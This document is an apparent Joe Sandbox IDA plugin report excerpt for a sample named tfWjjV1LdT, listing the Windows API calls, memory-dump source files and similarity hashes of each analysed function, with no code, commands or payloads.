                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: c264fc1f70cda2c886d521b77815dd7e3d1157184ece0268062832ee2258f3a2
                                                            • Instruction ID: 9a9485ce129a174970d5bb2c4f4dd6d6ac2c10d9424ad531f3be1e831bf6adfc
                                                            • Opcode Fuzzy Hash: c264fc1f70cda2c886d521b77815dd7e3d1157184ece0268062832ee2258f3a2
                                                            • Instruction Fuzzy Hash: D3115E7091010DCFCF40EF64D8619FEB7B6FF26744B2484A9D8156B692EB325D06CB54
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0070EC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0070EC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0070ED6A
                                                            • CloseHandle.KERNEL32(?), ref: 0070EDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: e4cb0035691f87a0117f48cd93f15aa955cb3323e0a2d17c83ad651e66bc3c75
                                                            • Instruction ID: ad00295b8214b431e2e39c266fa1d7534b3e1423149c7fb3b89902c512c3f65c
                                                            • Opcode Fuzzy Hash: e4cb0035691f87a0117f48cd93f15aa955cb3323e0a2d17c83ad651e66bc3c75
                                                            • Instruction Fuzzy Hash: 3E8160716047009FDB60EF28C886F2AB7EAEF85710F04891DF999DB6D2D674AC40CB95
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: 0d2d0d64ffd31a63ea2f740d2641a3298343e86765206d981d86435a0346f836
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: 235190B1A00B05DBDB249E69D8807EE77A7AF40322F24872DF826962D1D7719ED18B40
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 00710E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007100FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0071013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00710183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 007101AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007101BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 1ed5edced4a6c57ef586f4ba6bb4c1e2b1587fa31c3b6e6282350ec7547d5dc6
                                                            • Instruction ID: b81db293b0f369bcb1dca3f298abcb9ebd93c07d6bca92d721507ee7e2bedded
                                                            • Opcode Fuzzy Hash: 1ed5edced4a6c57ef586f4ba6bb4c1e2b1587fa31c3b6e6282350ec7547d5dc6
                                                            • Instruction Fuzzy Hash: AB516D71208204AFDB04EF68C881EAEB7E9FF84314F40891DF55587291DB75E984DB96
                                                            APIs
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0070D927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0070D9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0070D9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0070DA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0070DA21
                                                              • Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7896,?,?,00000000), ref: 00695A2C
                                                              • Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7896,?,?,00000000,?,?), ref: 00695A50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: b790f5bfe0d5a8540ce79ee6ef99add57d538108eaa6bc84cad3b0577133ccb2
                                                            • Instruction ID: da0684e06d1e7ad857a743d675e0e38d1d2b22333370d4657e202472ea92ac3c
                                                            • Opcode Fuzzy Hash: b790f5bfe0d5a8540ce79ee6ef99add57d538108eaa6bc84cad3b0577133ccb2
                                                            • Instruction Fuzzy Hash: EF512575A00209DFCB50EFA8C4859ADB7F9FF09320B04C169E85AAB352DB35AD45CF94
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006FE61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006FE648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006FE687
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006FE6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006FE6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: d57483b9dba42fb0566d0f0c7c7f8186426c95a7a076fe86bbed7dd22bfe7644
                                                            • Instruction ID: 71775cdb0b98f75dc11f1e0a8f7dbe0b13896c8369b5844978aafcb3124c2002
                                                            • Opcode Fuzzy Hash: d57483b9dba42fb0566d0f0c7c7f8186426c95a7a076fe86bbed7dd22bfe7644
                                                            • Instruction Fuzzy Hash: 48511E35600109DFCF41DF68C9819ADBBFAFF09314B148469E909AB761DB31ED11CB64
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db2f2915c3b4d3ea9def9c3875abd13d3fb484da50f3af6af617be7e57830c9e
                                                            • Instruction ID: e4e76ae071722c3ecacbabc491e7ceacdb4045aed5d4622aaa9ca4fda22619b7
                                                            • Opcode Fuzzy Hash: db2f2915c3b4d3ea9def9c3875abd13d3fb484da50f3af6af617be7e57830c9e
                                                            • Instruction Fuzzy Hash: 5241D035906208BFC721DB2CCC49FE9BBB9EB09320F144165E816A72E0D778AD81EA51
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00692357
                                                            • ScreenToClient.USER32(007557B0,?), ref: 00692374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 78860724c21ce158cc4c0f957959a30ff6ca3c90152f428296e9988744aea648
                                                            • Instruction ID: 22165d42bb53993bbc2bca4f547049b0f548df8f1e895e221bf353ddb5067cf7
                                                            • Opcode Fuzzy Hash: 78860724c21ce158cc4c0f957959a30ff6ca3c90152f428296e9988744aea648
                                                            • Instruction Fuzzy Hash: 3B415E3560411AFBDF159F68C844EF9BB7AFB05360F20835AF829922A0CB359D90DB91
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E63E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 006E6433
                                                            • TranslateMessage.USER32(?), ref: 006E645C
                                                            • DispatchMessageW.USER32(?), ref: 006E6466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E6475
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: 1c4c2c34fe8f8483fa565b2f4ab697dfa6cea600cdd590a1357d1c676cb108e0
                                                            • Instruction ID: 94bd3f6eaad05a244c4c636269b66b8588e274e8bb8ebccf5e101df3f15cda6e
                                                            • Opcode Fuzzy Hash: 1c4c2c34fe8f8483fa565b2f4ab697dfa6cea600cdd590a1357d1c676cb108e0
                                                            • Instruction Fuzzy Hash: 7931F471501782DFDB60CFB5CC44BE67BEAAB20381F14C165F421C22E1E7699445CB64
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 006E8A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 006E8ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006E8AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 006E8AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006E8AF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
                                                            • Instruction ID: 178f9b4315da45e053368a02b51cddb63639b38d8047839fcb9768e8c8c1c233
                                                            • Opcode Fuzzy Hash: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
                                                            • Instruction Fuzzy Hash: 9031CB71500259EFDB14CFADD948ADE3BA6FB04315F10822AF928EB2D0CBB09910DB90
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 006EB204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006EB221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006EB259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006EB27F
                                                            • _wcsstr.LIBCMT ref: 006EB289
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 2a695c29a84759a01d28b48246d100dc8f484d9cb21906d6b0cb11cad9514a49
                                                            • Instruction ID: bfb37b85a68fdd5fa89b6e29868ecefd68416d9e849ee587d4ae14a1162bb247
                                                            • Opcode Fuzzy Hash: 2a695c29a84759a01d28b48246d100dc8f484d9cb21906d6b0cb11cad9514a49
                                                            • Instruction Fuzzy Hash: 1C213371205340AEEB119B3A9C09ABF7B9ADF49760F00812DF904CA2A1EB61CD419364
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0071B192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0071B1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0071B1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 0071B1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00700E90,00000000), ref: 0071B216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 7a679aa13fceccb98458b9ffa5a99049a051fdcc9ca84f4274f897c347b7b897
                                                            • Instruction ID: 0f9702e459f3a37a47c9795b804a66d2447dd8fc5ed1e3856d1e089b95991e40
                                                            • Opcode Fuzzy Hash: 7a679aa13fceccb98458b9ffa5a99049a051fdcc9ca84f4274f897c347b7b897
                                                            • Instruction Fuzzy Hash: 63216B71A14655AFCB109F3C9C18AEA3BA5FB05361F158728F926D71E0E73898A09B90
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006E9320
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9352
                                                            • __itow.LIBCMT ref: 006E936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9392
                                                            • __itow.LIBCMT ref: 006E93A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: 123c8a1f66b8ff7e9be54cabe5bc70a4daa57f8a08097436f3e463709948246f
                                                            • Instruction ID: 6da03f272631a60a3836b9b4f9714acfb268f4ec0cae2526bff295a819ac61fa
                                                            • Opcode Fuzzy Hash: 123c8a1f66b8ff7e9be54cabe5bc70a4daa57f8a08097436f3e463709948246f
                                                            • Instruction Fuzzy Hash: 7021D731701348ABDB20AE659C86EEE7BAEEF48710F048029FD05DB2D1D6B08D4587A5
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 00705A6E
                                                            • GetForegroundWindow.USER32 ref: 00705A85
                                                            • GetDC.USER32(00000000), ref: 00705AC1
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00705ACD
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00705B08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 5f67a58d10eb7a0e1fea354418614b388959fa519afc0efc0b7922e07fa694df
                                                            • Instruction ID: 2a623f59e8a1c6e03bf53ffefb3d47ad9a8c30cff5d18a4ecdc69902b4d30d5b
                                                            • Opcode Fuzzy Hash: 5f67a58d10eb7a0e1fea354418614b388959fa519afc0efc0b7922e07fa694df
                                                            • Instruction Fuzzy Hash: 75218475A00504EFDB14EF69DC85AAABBE9EF48310F14C57DF84997392DA34AD00CB94
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0069135C
                                                            • BeginPath.GDI32(?), ref: 00691373
                                                            • SelectObject.GDI32(?,00000000), ref: 0069139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 2b301a6b46e1cd077eef0c8fcbda767cfe1daaace55ccab7c66369bfd5e469cb
                                                            • Instruction ID: 99801f8cf0f0d8be3fb3401636df4c24a51ba84b6c9a6711c88b85704383ad9f
                                                            • Opcode Fuzzy Hash: 2b301a6b46e1cd077eef0c8fcbda767cfe1daaace55ccab7c66369bfd5e469cb
                                                            • Instruction Fuzzy Hash: 46215130810709EBDF108F19DD147E97BB9EB11322F24C216F8119A6B0D3B9A991DF58
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 006F4ABA
                                                            • __beginthreadex.LIBCMT ref: 006F4AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 006F4AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006F4B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006F4B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 2ba40e38ef6418288a54d1a73e2cba456c3ca94c3b1445d1c0a468e8bfeec9b2
                                                            • Instruction ID: b63aeb2ab0ef4ac5a815e64caf79c78f9ca96f7cc43932afdb7d88084bf3f8bc
                                                            • Opcode Fuzzy Hash: 2ba40e38ef6418288a54d1a73e2cba456c3ca94c3b1445d1c0a468e8bfeec9b2
                                                            • Instruction Fuzzy Hash: E11108B6905618BBD7018FAC9C04AEB7FADEB49321F14C269F914D3391DAB9CD0087A4
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E821E
                                                            • GetLastError.KERNEL32(?,006E7CE2,?,?,?), ref: 006E8228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,006E7CE2,?,?,?), ref: 006E8237
                                                            • HeapAlloc.KERNEL32(00000000,?,006E7CE2,?,?,?), ref: 006E823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E8255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
